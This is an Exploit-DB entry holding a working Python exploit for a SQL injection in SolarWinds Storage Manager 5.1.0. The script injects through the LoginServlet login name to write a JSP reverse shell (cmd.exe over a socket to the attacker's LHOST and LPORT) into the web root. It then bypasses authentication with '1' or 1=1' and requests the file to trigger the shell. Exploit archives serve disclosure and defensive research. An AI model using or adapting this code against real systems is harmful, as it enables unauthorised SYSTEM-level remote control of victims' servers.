SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection

EDB-ID:

18818


Author:

muts

Type:

remote


Platform:

Windows

Date:

2012-05-01


#!/usr/bin/python
######################################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################


import urllib, urllib2, cookielib
import sys
import random

print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit"
print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 4):
	print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
	exit(0)

rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
	filename+=i
filename +=".jsp"

output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename

jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
	class StreamConnector extends Thread
	{
		InputStream is;
		OutputStream os;

		StreamConnector( InputStream is, OutputStream os )
		{
		this.is = is;
		this.os = os;
		}

		public void run()
		{
		BufferedReader in  = null;
		BufferedWriter out = null;
try
{
	in  = new BufferedReader( new InputStreamReader( this.is ) );
	out = new BufferedWriter( new OutputStreamWriter( this.os ) );
	char buffer[] = new char[8192];
	int length;
	while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
	{
		out.write( buffer, 0, length );
		out.flush();
	}
} catch( Exception e ){}
try
{
	if( in != null )
		in.close();
	if( out != null )
		out.close();
} catch( Exception e ){}
		}
	}

	try
	{
		Socket socket = new Socket( "''' + lhost +'''", '''+lport+''');
		Process process = Runtime.getRuntime().exec( "cmd.exe" );
		( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
		( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
	} catch( Exception e ) {}
%>'''

jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")

prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate='checkLogin'
password = 'OHAI'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password})
print "[*] Sending evil payload"
resp = opener.open("http://%s:9000/LoginServlet" %rhost, post_params)
print "[*] Triggering shell"
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpayload,'password' : password})
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s"  % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)

# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111 
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100